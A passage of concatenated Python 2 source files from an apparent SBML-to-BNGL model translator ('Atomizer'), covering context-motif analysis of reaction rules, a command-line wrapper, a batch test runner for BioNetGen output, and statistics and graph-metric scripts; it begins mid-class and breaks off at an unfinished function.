def getMotifFromPair(self, molecule, component1, component2):
return self.moleculeMotifDict[molecule][frozenset([component1, component2])]
def getParticipatingReactions(self, molecule, componentPair, reactionDictionary):
correlationList = {}
for moleculeName in reactionDictionary:
if moleculeName.startswith(molecule + '%'):
for component in reactionDictionary[moleculeName]:
if component[0] in componentPair and (component[1] == 1 or component[2] not in ['0', 0, '']):
for componentComplement in [x for x in reactionDictionary[moleculeName][component] if x in componentPair]:
correlationList[(component[0], componentComplement)] = (reactionDictionary[moleculeName][component][componentComplement])
return correlationList
def getPairsFromMotif(self, motif1, motif2, excludedComponents):
moleculeCorrelationList = defaultdict(dict)
for element in self.motifMoleculeDict:
if motif1 in element and motif2 in element:
if motif1 == motif2 and len([x for x in element if x == motif1]) < 2:
continue
for molecule in self.motifMoleculeDict[element]:
correlationList = {}
if len(self.motifMoleculeDict[element][molecule]) > 0:
for componentPair in self.motifMoleculeDict[element][molecule]:
if not any(x in excludedComponents for x in componentPair):
correlationList[componentPair] = self.getParticipatingReactions(molecule, componentPair, self.patternXreactions)
moleculeCorrelationList[molecule].update(correlationList)
return dict(moleculeCorrelationList)
def analyzeRedundantBonds(self, assumptions):
"""
Analyzes a system of molecules with redundant bonds between them (more than one path between any two nodes in the system). The function
attemps to score the bonds by looking out for partial competition relationships (e.g. the presence of one component
excludes the activation of another, but in the other direction we see independence) which are less likely to occur than a fully independence
relationship. The method will thus nominate such edges for deletion if the overall systems still forms
a fully connected graph after the bond removal.
"""
def fullyConnectedGraph(nodes, edges):
"""
Lazy implementation. This only works if there is one common elements to all subgraphs
"""
if edges == []:
return False
tmpNodeList = [set(x) for x in edges]
superGraph = set.intersection(*map(set, edges))
if len(superGraph) > 0:
return True
return False
conserveBonds = []
deleteBonds = {}
for redundantBondSet in assumptions:
allBonds = [sorted(x) for x in itertools.combinations(redundantBondSet, 2)]
conserveBonds = []
for molecule in redundantBondSet:
for x in itertools.combinations([x for x in redundantBondSet if x != molecule], 2):
contextMotif = self.getMotifFromPair(molecule, x[0].lower(), x[1].lower())
if ('independent' in contextMotif and not ('requirement' in contextMotif or 'nullrequirement' in contextMotif)) \
or set(contextMotif) == set(['requirement', 'nullrequirement']):
conserveBonds.append(sorted([molecule, x[0]]))
conserveBonds.append(sorted([molecule, x[1]]))
if fullyConnectedGraph(redundantBondSet, conserveBonds):
deleteBonds[redundantBondSet] = [x for x in allBonds if x not in conserveBonds]
return deleteBonds
def scoreHypotheticalBonds(self, assumptions):
"""
TODO: we need some way to evaluate the confidence in a bond based on context information
"""
pass
def getDifference(self, pattern1, pattern2, translator):
if pattern1 not in translator or pattern2 not in translator:
return None
species1 = translator[pattern1]
species2 = translator[pattern2]
species1.sort()
species2.sort()
componentDifference = []
for molecule1,molecule2 in zip(species1.molecules,species2.molecules):
for component1,component2 in zip(molecule1.components,molecule2.components):
if len(component1.bonds) != len(component2.bonds) or component1.activeState != component2.activeState:
componentDifference.append(component1.name)
return componentDifference
def processContextMotifInformation(self, assumptionList, database):
def getClassification(keys, translator):
flags = [key in [x.lower() for x in translator.keys()] for key in keys]
if all(flags):
return 'binding-binding'
elif any(flags):
return 'modification-binding'
return 'modification-modification'
motifInformationDict = self.getContextMotifInformation()
motifFinalLog = defaultdict(set)
motifReactionDefinitions = {}
for motifInformation in motifInformationDict:
# iterate over motifs that are known to be problematic
if motifInformation in [frozenset(['nullrequirement', 'independent']), frozenset(['requirement', 'independent'])]:
for molecule in motifInformationDict[motifInformation]:
if len(motifInformationDict[motifInformation][molecule]) == 0:
continue
# if the candidate definitions for a given compound are related to a molecule with problematic motifs
for assumption in (x for x in assumptionList for y in eval(x[3][1]) for z in y if molecule in z):
candidates = eval(assumption[1][1])
alternativeCandidates = eval(assumption[2][1])
original = eval(assumption[3][1])
# further confirm that the change is about the pair of interest
# by iterating over all candidates and comparing one by one
for candidate in candidates:
for alternativeCandidate in alternativeCandidates:
difference = [x for x in candidate if x not in alternativeCandidate]
difference.extend([x for x in alternativeCandidate if x not in candidate])
# if we are referencing a molecule that is not about this particular context change
# dont store it in the motif/species table, just keep information about the motif alone
localAnalysisFlag = True
if not any([molecule in database.prunnedDependencyGraph[x][0] if
len(database.prunnedDependencyGraph[x]) > 0 else molecule
in x for x in difference]):
localAnalysisFlag = False
# continue
if localAnalysisFlag:
# get those elements that differ between the two candidates and that correspond to the current <molecule> being analyzed
difference = [x for x in candidate if x not in alternativeCandidate and resolveEntry(database.prunnedDependencyGraph, [x])[0] == molecule]
alternativeDifference = [x for x in alternativeCandidate if x not in candidate and molecule in resolveEntry(database.prunnedDependencyGraph, [x])[0]]
# get the difference patterns for the two species
if not difference or not alternativeDifference:
continue
componentDifference = self.getDifference(difference[0], alternativeDifference[0], database.translator)
# make sure that the current motif candidate intersects with the difference pattern
for keys in motifInformationDict[motifInformation][molecule]:
if localAnalysisFlag and any(key in componentDifference for key in keys):
motifFinalLog['{0}({1})'.format(molecule, ', '.join(keys))].add(assumption[0])
classification = getClassification(keys, database.translator)
if classification not in motifReactionDefinitions:
motifReactionDefinitions[classification] = {}
motifReactionDefinitions[classification]['{0}({1})'.format(molecule, ', '.join(keys))] = (motifInformation, motifInformationDict[motifInformation][molecule][keys])
#pprint.pprint(dict(motifFinalLog))
#pprint.pprint(motifReactionDefinitions)
return motifFinalLog, motifReactionDefinitions
def getContextMotifInformation(self):
'''
returns the reactions in the system classified by context-component motif pairs. e.g. a requirement,nullrequirement
motif pair is a pair of components A->B such that B needs for A to be activated to activate, whereas A needs for B
to be inactivated to activate.
'''
relationshipCombinations = itertools.combinations(['independent', 'requirement', 'nullrequirement', 'exclusion'], 2)
motifDictionary = {}
for relCombi in relationshipCombinations:
motifDictionary[frozenset(relCombi)] = self.getPairsFromMotif(relCombi[0], relCombi[1], [])
for requirementClass in ['independent', 'requirement', 'nullrequirement', 'exclusion']:
motifDictionary[frozenset([requirementClass, requirementClass])] = self.getPairsFromMotif(requirementClass, requirementClass, [])
return motifDictionary
def getComplexReactions(self, threshold=2):
complexRules = []
for rule in self.rules:
if len([x for x in rule[0].actions if x.action not in ['ChangeCompartment']]) >= threshold:
complexRules.append(rule)
return complexRules
def analyzeComplexReactions(self, threshold=2):
def getActionableComponentPartners(actions, molecule):
actionableComponents = []
for action in actions:
if action[1] and action[1] in molecule.lower():
actionableComponents.append(action[2])
if action[2] and action[2] in molecule.lower():
actionableComponents.append(action[1])
return actionableComponents
for reaction in self.getComplexReactions():
#analyze reactions with cis-allostery (e.g. two actions sites are on the same molecule)
if len([x for x in self.reactionsXpatterns[reaction[0].label] if len(self.reactionsXpatterns[reaction[0].label][x]) > 1]) ==0:
continue
print '----------'
if reaction[0].label in self.rawRules:
print str(self.rawRules[reaction[0].label])
print '>>>>>>'
print str(reaction[0])
else:
print str(reaction[0].label)
#print str(reaction[0])
resolvedActions = []
print 'Actions:'
changeFlag = 0
for action in reaction[0].actions:
molecule1 = reaction[-3]['_'.join(action.site1.split('_')[:-1])] if action.site1 else ''
molecule2 = reaction[-3]['_'.join(action.site2.split('_')[:-1])] if action.site2 else ''
site1 = reaction[-3][action.site1] if action.site1 else ''
site2 = reaction[-3][action.site2] if action.site2 else ''
print '\t{0}= {1}({2}), {3}({4})'.format(action.action,molecule1,site1,molecule2,site2)
if action.action == 'DeleteBond':
changeFlag = 1
resolvedActions.append([action.action,site1,site2])
print 'Context:'
for reactionCenter in self.reactionsXpatterns[reaction[0].label]:
#cys rules
if len(self.reactionsXpatterns[reaction[0].label][reactionCenter]) > 1:
for state in self.reactionsXpatterns[reaction[0].label][reactionCenter]:
#we will focus on statechange actions for now
if state[2] not in ['']:
#print self.patternXreactions[reactionCenter]
actionableComponents = getActionableComponentPartners([x for x in resolvedActions if x[0] in ['AddBond', 'DeleteBond']],reactionCenter)
for component in actionableComponents:
print '\treaction center <{0}>, context <{1}> in molecule <{2}>:'.format(component,state[0],reactionCenter)
print '\t', {x: dict(self.patternXreactions[reactionCenter][(component, changeFlag, '')][x]) \
for x in self.patternXreactions[reactionCenter][(component, changeFlag, '')] if x in [state[0],state[0].lower()]}
print '+++++++++'
def defineConsole():
"""
defines the program console line commands
"""
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-i', '--input', type=str, help='sbml file')
parser.add_argument('-r', '--raw', type=str, help='raw sbml file')
parser.add_argument('-t','--tests',action='store_true',help='run unit tests')
return parser
def runTests():
import doctest
doctest.testmod()
if __name__ == "__main__":
parser = defineConsole()
namespace = parser.parse_args()
if namespace.tests:
runTests()
exit()
inputFile = namespace.input
modelLearning = ModelLearning(namespace.input, namespace.raw)
#print modelLearning.getMotifFromPair('EGFR','grb2','shc')
#print modelLearning.getMotifFromPair('Shc','grb2','egfr')
#modelLearning.analyzeComplexReactions()
#for rule in complexRules:
# print str(rule[0])
relationshipCombinations = itertools.combinations(['independent', 'requirement', 'nullrequirement', 'exclusion'], 2)
motifDictionary = {}
for relCombi in relationshipCombinations:
motifDictionary[relCombi] = modelLearning.getPairsFromMotif(relCombi[0], relCombi[1],['imod'])
if len(motifDictionary[relCombi]) > 0:
print relCombi, {x:len(motifDictionary[relCombi][x]) for x in motifDictionary[relCombi]}
for requirementClass in ['independent', 'requirement', 'nullrequirement', 'exclusion']:
motifDictionary[(requirementClass,requirementClass)] = modelLearning.getPairsFromMotif(requirementClass, requirementClass, ['imod'])
if len(motifDictionary[(requirementClass, requirementClass)]) > 0:
print (requirementClass, requirementClass), {x:len(motifDictionary[(requirementClass,requirementClass)][x]) for x in motifDictionary[(requirementClass,requirementClass)]}
print modelLearning.getPairsFromMotif('independent','requirement',['imod'])
print '---'
#print modelLearning.getPairsFromMotif('independent','nullrequirement',['imod'])
```
#### File: source_Atomizer/SBMLparser/sbmlTranslator.py
```python
import libsbml2bngl as ls2b
import argparse
import yaml
def defineConsole():
parser = argparse.ArgumentParser(description='SBML to BNGL translator')
parser.add_argument('-i', '--input-file', type=str, help='input SBML file', required=True)
parser.add_argument('-t', '--annotation', action='store_true', help='keep annotation information')
parser.add_argument('-o', '--output-file', type=str, help='output SBML file')
parser.add_argument('-c', '--convention-file', type=str, help='Conventions file')
parser.add_argument('-n', '--naming-conventions', type=str, help='Naming conventions file')
parser.add_argument('-u', '--user-structures', type=str, help='User defined species')
parser.add_argument('-id', '--molecule-id', action='store_true', help='use SBML molecule ids instead of names. IDs are less descriptive but more bngl friendly. Use only if the generated BNGL has syntactic errors')
parser.add_argument('-nc','--no-conversion', action='store_true', help='do not convert units. Copy straight from sbml to bngl')
parser.add_argument('-a', '--atomize', action='store_true', help='Infer molecular structure')
parser.add_argument('-p', '--pathwaycommons', action='store_true', help='Use pathway commons to infer molecule binding. This setting requires an internet connection and will query the pathway commons web service.')
parser.add_argument('-b', '--bionetgen-analysis', type=str, help='Set the BioNetGen path for context post analysis.')
parser.add_argument('-s','--isomorphism-check', action='store_true', help='disallow atomizations that produce the same graph structure')
parser.add_argument('-I','--ignore', action='store_true', help='ignore atomization translation errors')
return parser
def checkInput(namespace):
options = {}
options['inputFile'] = namespace.input_file
conv, useID, naming = ls2b.selectReactionDefinitions(options['inputFile'])
options['outputFile'] = namespace.output_file if namespace.output_file is not None else options['inputFile'] + '.bngl'
options['conventionFile'] = namespace.convention_file if namespace.convention_file is not None else conv
options['userStructure'] = namespace.user_structures
options['namingConventions'] = namespace.naming_conventions if namespace.naming_conventions is not None else naming
options['useId'] = namespace.molecule_id
options['annotation'] = namespace.annotation
options['atomize'] = namespace.atomize
options['pathwaycommons'] = namespace.pathwaycommons
options['bionetgenAnalysis'] = namespace.bionetgen_analysis
options['isomorphismCheck'] = namespace.isomorphism_check
options['ignore'] = namespace.ignore
options['noConversion'] = namespace.no_conversion
return options
def main():
parser = defineConsole()
namespace = parser.parse_args()
options = checkInput(namespace)
returnArray = ls2b.analyzeFile(options['inputFile'], options['conventionFile'], options['useId'], options['namingConventions'],
options['outputFile'], speciesEquivalence=options['userStructure'],
atomize=options['atomize'], bioGrid=False, pathwaycommons=options['pathwaycommons'], ignore=options['ignore'], noConversion = options['noConversion'])
if namespace.bionetgen_analysis and returnArray:
ls2b.postAnalyzeFile(options['outputFile'], namespace.bionetgen_analysis, returnArray.database)
if namespace.annotation and returnArray:
with open(options['outputFile'] + '.yml', 'w') as f:
f.write(yaml.dump(returnArray.annotation, default_flow_style=False))
if __name__ == "__main__":
main()
```
#### File: SBMLparser/testing/evaluate.py
```python
from os import listdir
from os.path import isfile, join
import os
import subprocess
import time
import datetime
import signal
def evaluate(fileName):
timeout = 30
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev', './' + fileName],stderr=outfile,stdout=d)
#result = subprocess.Popen(['bngdev', './' + fileName],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
subprocess.call(['killall','run_network'])
subprocess.call(['killall','bngdev'])
return 5
d.close()
if result.poll() > 0:
with open('temp.tmp','r') as outfile:
lines = outfile.readlines()
if 'cvode' in ','.join(lines):
return 2
elif 'ABORT: Reaction rule list could not be read because of errors' in ','.join(lines):
return 3
else:
return 4
else:
return result.poll()
def validate(fileName):
timeout = 30
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev','--xml', './' + fileName],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
#subprocess.call(['killall','run_network'])
subprocess.call(['killall','bngdev'])
return 5
d.close()
return result.poll()
def analyzeErrors(directory):
errorLog = {'delay':0,'noninteger':0,'pseudo':0,'dependency':0
,'rules':0,'others':0,'malformed':0}
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory, f)) ]
logFiles = [x[0:-4] for x in onlyfiles if 'log' in x]
errorFiles = 0
#dont skip the files that only have warnings
for log in logFiles:
with open('./' + directory + '/' + log +'.log','r') as f:
k = f.readlines()
logText = ','.join(k)
conditions = ['delay','pseudo','natural reactions','Malformed','dependency cycle','non integer stoicheometries']
if 'ERROR' in logText:
errorFiles +=1
if 'delay' in logText and all([x not in logText for x in conditions if 'delay' != x]):
errorLog['delay'] += 1
elif 'pseudo' in logText and all([x not in logText for x in conditions if 'pseudo' != x]):
errorLog['pseudo'] += 1
elif 'natural reactions' in logText and all([x not in logText for x in conditions if 'natural reactions' != x]):
errorLog['rules'] += 1
elif 'Malformed' in logText and all([x not in logText for x in conditions if 'Malformed' != x]):
errorLog['malformed'] += 1
elif 'dependency cycle' in logText and all([x not in logText for x in conditions if 'dependency cycle' != x]):
errorLog['dependency'] += 1
elif 'non integer stoicheometries' in logText and all([x not in logText for x in conditions if 'non integer stoicheometries' != x]):
errorLog['noninteger'] += 1
else:
errorLog['others'] +=1
print errorLog,errorFiles
def createValidFileBatch(directory):
import zipfile
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory, f)) ]
logFiles = [x[0:-4] for x in onlyfiles if x.endswith('log')]
errorFiles = []
for x in logFiles:
with open('./' + directory + '/' + x +'.log','r') as f:
k = f.readlines()
if 'ERROR' in ','.join(k):
errorFiles.append(x)
bnglFiles = [x for x in onlyfiles if x.endswith('bngl')]
validFiles = [x for x in bnglFiles if x not in errorFiles]
with zipfile.ZipFile('validComplex.zip','w') as myzip:
for bngl in validFiles:
myzip.write('./{0}/{1}'.format(directory,bngl),bngl)
def main():
directory = 'raw'
onlyfiles = [ f for f in listdir('./' + directory) if isfile(join('./' + directory,f)) ]
logFiles = [x[0:-4] for x in onlyfiles if 'log' in x]
errorFiles = []
#dont skip the files that only have warnings
for x in logFiles:
with open('./' + directory + '/' + x +'.log','r') as f:
k = f.readlines()
if 'ERROR' in ','.join(k):
errorFiles.append(x)
bnglFiles = [x for x in onlyfiles if 'bngl' in x and 'log' not in x]
validFiles = [x for x in bnglFiles if x not in errorFiles]
print 'Thrown out: {0}'.format(len(bnglFiles)-len(validFiles))
skip = [] #['334','225','332','105','293','333','337','18','409']
counter = 0
with open('executionTestErrors' + '.log', 'w') as f:
subprocess.call(['rm','./*net'])
for idx,bnglFile in enumerate(sorted(validFiles)):
#if '100.' not in bnglFile:
# continue
print bnglFile,
timeout = 30
if len([x for x in skip if x in bnglFile]) > 0:
continue
with open('temp.tmp', "w") as outfile:
d = open('dummy.tmp','w')
start = datetime.datetime.now()
result = subprocess.Popen(['bngdev', './' + directory+ '/{0}'.format(bnglFile)],stderr=outfile,stdout=d)
while result.poll() is None:
time.sleep(0.1)
now = datetime.datetime.now()
if (now - start).seconds > timeout:
os.kill(result.pid, signal.SIGKILL)
os.waitpid(-1, os.WNOHANG)
subprocess.call(['killall','run_network'])
print 'breaker',
counter -=1
break
d.close()
if result.poll() > 0:
with open('temp.tmp','r') as outfile:
lines = outfile.readlines()
tag = ''
if 'cvode' in ','.join(lines):
print '///',bnglFile
tag = 'cvode'
elif 'ABORT: Reaction rule list could not be read because of errors' in ','.join(lines):
print '\\\\\\',bnglFile
#elif 'Incorrect number of arguments' in ','.join(lines):
# print '[[]]',bnglFile
else:
print '---',bnglFile
tag = lines
f.write('%s %s\n' % (bnglFile,tag))
f.flush()
else:
counter += 1
print '+++',bnglFile
print counter
if __name__ == "__main__":
#main()
#analyzeErrors('complex')
createValidFileBatch('complex')
```
#### File: source_Atomizer/stats/atomizationStatistics.py
```python
import pandas
from scipy import stats
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import progressbar
from richContactMap import reactionBasedAtomization, stoichiometryAnalysis, extractActiveMolecules, getValidFiles
import readBNGXML
from collections import Counter
import SBMLparser.utils.annotationExtractor as annEx
from scipy.stats import kendalltau
sns.set_style("white")
def constructHistogram(data, fileName, xlabel, ylabel, bins=10):
"""
constructs a histogram based on the information in data
"""
_, axs = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
plt.clf()
sns.set_palette("BuGn_d")
if type(bins) != int:
axs.set_xlim(xmin=0,xmax=bins[-1])
sns.distplot(data, kde=False, rug=False, bins=bins, hist_kws=dict(alpha=1))
#plt.hist(ratomization)
plt.xlabel(xlabel, fontsize=18)
plt.ylabel(ylabel, fontsize=18)
plt.savefig(fileName)
def hexbin(x, y, color, **kwargs):
cmap = sns.light_palette(color, as_cmap=True)
plt.hexbin(x, y, gridsize=15, cmap=cmap, **kwargs)
def create2DdensityPlot(dataframe, columns, axisNames, outputfilename, plotType=sns.kdeplot, xlim=(0, 1), ylim=(0, 1)):
"""
creates a 2d density plot given a dataframe and two columns.
saves the image in <outputfilename>
"""
plt.clf()
_, _ = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
g = sns.JointGrid(columns[0], columns[1], dataframe, xlim=xlim, ylim=ylim, space=0)
g.plot_marginals(sns.distplot, color="g", bins=None)
g.plot_joint(plotType, cmap="Greens", shade=True, n_levels=20)
g.set_axis_labels(axisNames[0], axisNames[1])
#ax = g.ax_joint
#ax.set_xscale('log')
#ax.set_yscale('log')
#g.ax_marg_x.set_xscale('log')
#g.ax_marg_y.set_yscale('log')
g.annotate(stats.pearsonr)
plt.savefig(outputfilename)
def createHexBin(dataframe,columns,axisnames,outputfilename,xlim=(0,1),ylim=(0,1)):
plt.clf()
g = sns.JointGrid(columns[0], columns[1], dataframe, space=0)
g.ax_marg_x.hist(dataframe[columns[0]], bins=np.arange(xlim[0], xlim[1]))
g.ax_marg_y.hist(dataframe[columns[1]], bins=np.arange(ylim[0], ylim[1], orientation="horizontal"))
#g.ax_marg_x.hist(x, bins=np.arange(0, 60)
#g.ax_marg_y.hist(y, bins=np.arange(0, 1000, 10), orientation="horizontal")
g.plot_joint(plt.hexbin, gridsize=25, extent=[xlim[0], xlim[1], ylim[0], ylim[1]], cmap="Blues")
#g.fig.savefig("/Users/mwaskom/Desktop/jointgrid.png", bbox_inches="tight")
#f, _ = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
#g = sns.JointGrid(columns[0], columns[1], dataframe, xlim=xlim, ylim=ylim, space = 0)
#g.plot_marginals(sns.distplot, color="g")
#g.plot_joint(plt.hexbin, cmap="Greens", extent=[0, np.max(dataframe[columns[0]]), 0, np.max(dataframe[columns[1]])])
#g.annotate(stats.pearsonr)
#sns.jointplot(dataframe[columns[0]], dataframe[columns[1]], kind="hex", stat_func=stats.pearsonr, color="g", gridsize=8)
g.fig.savefig(outputfilename)
def create1Ddensityplot(data, outputfilename):
plt.clf()
f, (ax1) = plt.subplots(1, 1, sharex=True, figsize=(8, 6))
# with sns.axes_style("white"):
#sns.jointplot("compression", "wiener index",atomizationInfo, kind="kde");
sns.kdeplot(data, shade=True, ax=ax1, clip=(0, 1), bw=0.5)
plt.savefig(outputfilename)
def reactionBasedAtomizationDistro(directory):
'''
calculates a rection atomization based metric:
ration of atomized reactions (non syndeg) in a model
'''
syndelArray = []
atomizedDistro = []
nonAtomizedDistro = []
atomizationDB = pandas.DataFrame()
# generate bng-xml
# generateBNGXML(directory)
print 'reading bng-xml files'
xmlFiles = getValidFiles(directory, 'xml')
print 'analyzing {0} bng-xml files'.format(len(xmlFiles))
progress = progressbar.ProgressBar()
validFiles = 0
for i in progress(range(len(xmlFiles))):
xml = xmlFiles[i]
# for xml in xmlFiles:
try:
# console.bngl2xml('complex/output{0}.bngl'.format(element),timeout=10)
try:
structures = readBNGXML.parseFullXML(xml)
rules = structures['rules']
observables = structures['observables']
molecules = structures['molecules']
except IOError:
print xml
continue
atomizedProcesses, weight = reactionBasedAtomization(rules)
ato, nonato = stoichiometryAnalysis(rules)
atomizedDistro.extend(ato)
nonAtomizedDistro.extend(nonato)
# if (2,1) in nonato:
# interesting.append(element)
score = atomizedProcesses * 1.0 / weight if weight != 0 else 0
#totalRatomizedProcesses += atomizedProcesses
#totalReactions += len(rules)
#totalProcesses += weight
# calculate yield
activeMolecules = extractActiveMolecules(rules)
activeMoleculeTypes = [x for x in molecules if x.name in activeMolecules]
yieldValue = len([x for x in activeMoleculeTypes if len(
x.components) > 0]) * 1.0 / len(activeMoleculeTypes) if len(activeMoleculeTypes) > 0 else 0
# syndel value
syndelValue = 1 - (len(rules) - weight) * 1.0 / len(rules) if len(rules) > 0 else 0
atomizationDB.set_value(xml, 'score', score)
atomizationDB.set_value(xml, 'weight', weight)
atomizationDB.set_value(xml, 'length', len(rules))
atomizationDB.set_value(xml, 'yild', yieldValue)
atomizationDB.set_value(xml, 'syndel', syndelValue)
atomizationDB.set_value(xml, 'numspecies', len(observables))
validFiles += 1
except IOError:
print 'io'
continue
print 'found {0} models i could extract info from'.format(validFiles)
return atomizationDB
def extractAnnotationsFromModelSet(modelList):
modelAnnotationsCounter = Counter()
for model in modelList:
annotationExtractor = annEx.AnnotationExtractor(model)
modelAnnotations = annotationExtractor.getModelAnnotations()
speciesAnnotations = annotationExtractor.getAnnotationSystem()
#print speciesAnnotations
speciesAnnotations = set([z for x in speciesAnnotations for y in speciesAnnotations[x] for z in speciesAnnotations[x][y]])
modelAnnotationsCounter.update(speciesAnnotations)
print modelAnnotationsCounter.most_common(20)
def constructPlots(atomizationDB):
"""
Given a pandas data frame object it creates a series of histogram and kde plots describing the characteristics of a set of atomized
models
"""
constructHistogram(atomizationDB['syndel'], '{0}/syndelHist.png'.format(outputDir), 'Fraction of non syn-del reactions', 'Number of models')
constructHistogram(atomizationDB['yild'], '{0}/yieldHist.png'.format(outputDir), 'Yield score', 'Number of models')
constructHistogram(atomizationDB['score'], '{0}/atomizationHist.png'.format(outputDir), 'Percentage of reactions with mechanistic processes', 'Number of models')
create2DdensityPlot(atomizationDB, ['score', 'yild'], ['Atomization score', 'Yield score'], '{0}/atomizationvsyield.png'.format(outputDir))
create2DdensityPlot(atomizationDB, ['syndel', 'yild'], ['Percentage or non-syndel reactions', 'Yield score'], '{0}/syndelvsyield.png'.format(outputDir))
#createHexBin(atomizationDB, ['syndel', 'yild'], ['Percentage or non-syndel reactions', 'Yield score'], '{0}/syndelvsyieldhex.png'.format(outputDir))
if __name__ == "__main__":
folder = 'curated'
# calculate atomization information
atomizationDB = reactionBasedAtomizationDistro(folder)
atomizationDB.to_hdf('{0}DB.h5'.format(folder),'atomization')
outputDir = 'testCurated'
# read info
#atomizationDB = pandas.read_hdf('{0}DB.h5'.format(folder), 'atomization')
# construct plots
#constructPlots(atomizationDB)
#testSet = list(atomizationDB.query('(yild < 0.6) & (syndel > 0.8)').index)
#testSet = ['XMLExamples/{0}'.format(x[:-4]) for x in testSet]
#print extractAnnotationsFromModelSet(testSet)
```
#### File: source_Atomizer/stats/graphAnalysis.py
```python
import networkx as nx
from networkx.algorithms import bipartite
import numpy as np
import pandas
import os
import fnmatch
import sys
import yaml
import scipy
sys.path.insert(0, '.')
sys.path.insert(0, os.path.join('.','SBMLparser'))
#import SBMLparser.utils.consoleCommands as consoleCommands
import concurrent.futures
import multiprocessing as mp
import progressbar
import argparse
import os.path
def loadGraph(graphname):
"""
load GML file as a digraph object from a filename
"""
graph = nx.read_gml(graphname)
return graph
def getFiles(directory,extension,abspath=False):
"""
Gets a list of <extension> files that could be correctly translated in a given 'directory'
Keyword arguments:
directory -- The directory we will recurseviley get files from
extension -- A file extension filter
"""
matches = []
for root, dirnames, filenames in os.walk(directory):
for filename in fnmatch.filter(filenames, '*.{0}'.format(extension)):
filepath = os.path.join(root, filename)
if abspath:
filepath = os.path.abspath(filepath)
matches.append([filepath,os.path.getsize(os.path.join(root, filename))])
#sort by size
#matches.sort(key=lambda filename: filename[1], reverse=False)
matches = [x[0] for x in matches]
return matches
from collections import Counter
class ProcessGraph:
"""
creates a pandas dataframe from a gml file containing several graph metrics
like centrality and wiener index
"""
def __init__(self,graph):
self.graph = graph
graphics = {x:self.graph.node[x]['graphics']['type'] for x in self.graph.node}
#print {x:self.graph.node[x]['graphics'] for x in self.graph.node}
self.nodes = pandas.DataFrame.from_dict(self.graph.node,orient='index')
self.nodes['graphics'] = pandas.Series(graphics)
self.nodes['graphics'] = self.nodes['graphics'].map({'roundrectangle': 'species', 'hexagon': 'process'})
def entropy(self,dist):
"""
Returns the entropy of `dist` in bits (base-2).
"""
dist = np.asarray(dist)
ent = np.nansum( dist * np.log2( 1/dist ) )/np.log2(len(dist))
return ent
def centrality_distribution(self,node_type):
"""
Returns a centrality distribution.
Each normalized centrality is divided by the sum of the normalized
centralities. Note, this assumes the graph is simple.
"""
centrality = self.nodes[self.nodes.graphics == node_type]['degree'].values
centrality = np.asarray(centrality)
centrality /= centrality.sum()
return centrality
def removeContext(self):
context2 = []
context3 = []
edges = self.graph.edges(data=True)
for source,destination,data in edges:
if 'graphics' in data:
if data['graphics']['fill'] == u'#798e87':
context2.append((source,destination))
else:
for idx in data:
if 'graphics' in data[idx]:
if data[idx]['graphics']['fill'] == u'#798e87':
context3.append((source,destination,idx))
self.graph.remove_edges_from(context2)
self.graph.remove_edges_from(context3)
def wiener(self):
g2 = nx.Graph(self.graph)
speciesnodes = set(n for n, d in self.graph.nodes(data=True) if d['graphics']['type']=='roundrectangle')
wienerIndex = []
connected = 0
for node1 in speciesnodes:
wiener = 0
for node2 in speciesnodes:
if node1 == node2:
continue
try:
wiener += len(nx.shortest_path(g2,node1,node2)) - 1
connected += 1
except nx.exception.NetworkXNoPath:
continue
wienerIndex.append(wiener)
if connected ==0:
return 0,1
return sum(wienerIndex)*1.0/connected,self.entropy(np.asarray(wienerIndex)*1.0/sum(wienerIndex))
def graphMeasures(self):
"""
calculates several graph measures
"""
#average_degree_connectivity = nx.average_degree_connectivity(self.graph)
#average_neighbor_degree = nx.average_neighbor_degree(self.graph)
average_node_connectivity = nx.average_node_connectivity(self.graph)
#average_node_connectivity = 1
return [average_node_connectivity]
def centrality(self):
"""
calculates several measures of node centrality and stores them in the general node table
"""
speciesnodes = set(n for n, d in self.graph.nodes(data=True) if d['graphics']['type']=='roundrectangle')
g2 = nx.Graph(self.graph)
self.nodes['degree'] = pandas.Series(nx.degree_centrality(self.graph))
self.nodes['closeness'] = pandas.Series(nx.closeness_centrality(self.graph))
self.nodes['betweenness'] = pandas.Series(nx.betweenness_centrality(self.graph))
self.nodes['communicability'] = pandas.Series(nx.communicability_centrality(g2))
#print self.nodes.sort(column='load',ascending=False).head(20)
#
def generateGraph(bngfile,timeout=180,graphtype='regulatory',options = []):
"""
Generates a bng-xml file via the bng console
"""
#consoleCommands.generateGraph(bngfile,graphtype,options)
graphname = '.'.join(bngfile.split('.')[:-1]) + '_{0}.gml'.format(graphtype)
graphname = graphname.split('/')[-1]
return graphname
def getGraphEntropy(graphname,nodeType):
"""
given a filename pointing to a gml file it will return a series of metrics describing
the properties of the graph
"""
#try:
graph = loadGraph(graphname)
process = ProcessGraph(graph)
#process.removeContext()
try:
process.centrality()
dist = process.centrality_distribution(node_type=nodeType)
centropy = process.entropy(dist)
#centropy = 1
except ZeroDivisionError:
centropy = 1
#print process.wiener()
#return graphname,nodeType,process.wiener(),centropy,process.graphMeasures(),
#[len(process.nodes[process.nodes.graphics =='process']),len(process.nodes[process.nodes.graphics=='species']),len(graph.edges)]
return {'graphname':graphname,'nodeType':nodeType,
'wiener':process.wiener(),'centropy':centropy,
'measures': process.graphMeasures(),
'graphstats':[len(process.nodes[process.nodes.graphics =='process']),len(process.nodes[process.nodes.graphics=='species']),len(graph.edges())]
}
#except:
# return graphname,nodeType,-1
import shutil
def createGMLFiles(directory,options):
bngfiles= getFiles(directory,'bngl')
for bngfile in bngfiles:
for option in options:
graphname = generateGraph(bngfile,options = options[option])
shutil.move(graphname, os.path.join(directory,option))
def defineConsole():
